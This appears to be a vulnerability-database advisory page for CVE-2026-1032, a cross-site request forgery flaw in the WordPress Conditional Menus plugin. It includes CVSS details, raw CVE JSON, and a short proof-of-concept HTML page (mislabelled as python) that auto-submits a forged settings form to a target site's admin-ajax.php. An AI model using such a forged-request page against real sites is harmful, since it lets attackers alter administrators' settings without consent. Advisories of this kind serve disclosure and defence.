Security Vulnerability Report
中文
CVE-2026-1032 CVSS 4.3 MEDIUM

CVE-2026-1032

Published: 2026-03-26 14:16:09
Last Modified: 2026-04-24 16:35:20

Description

The Conditional Menus plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.6. This is due to missing nonce validation on the 'save_options' function. This makes it possible for unauthenticated attackers to modify conditional menu assignments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Conditional Menus <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-1032 CSRF Vulnerability Target: WordPress Conditional Menus Plugin <= 1.2.6 Description: This HTML file demonstrates how an attacker could trick an admin into changing settings. --> <html> <body> <h2>You are being redirected...</h2> <!-- The actual exploit would happen via auto-submitting a form --> <form action="http://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="save_options"> <input type="hidden" name="menu_assignments" value="malicious_configuration"> <input type="submit" value="Click me"> </form> <script> // Automatically submit the form to demonstrate the attack document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1032", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:08.507", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Conditional Menus plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.6. This is due to missing nonce validation on the 'save_options' function. This makes it possible for unauthenticated attackers to modify conditional menu assignments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Conditional Menus para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.2.6, inclusive. Esto se debe a la falta de validación de nonce en la función 'save_options'. Esto hace posible que atacantes no autenticados modifiquen las asignaciones de menús condicionales a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/conditional-menus/tags/1.2.6/init.php#L183", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/conditional-menus/tags/1.2.6/init.php#L190", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3463814/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f4cf85d-6105-4f7d-b4a0-18a3513a93a8?source=cve", "source": "[email protected]"}]}}